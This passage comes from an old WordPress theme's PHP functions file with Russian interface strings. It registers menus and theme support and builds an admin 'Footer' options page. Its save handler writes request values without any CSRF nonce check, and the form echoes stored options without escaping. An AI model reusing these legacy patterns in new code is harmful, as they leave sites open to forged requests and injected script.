		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
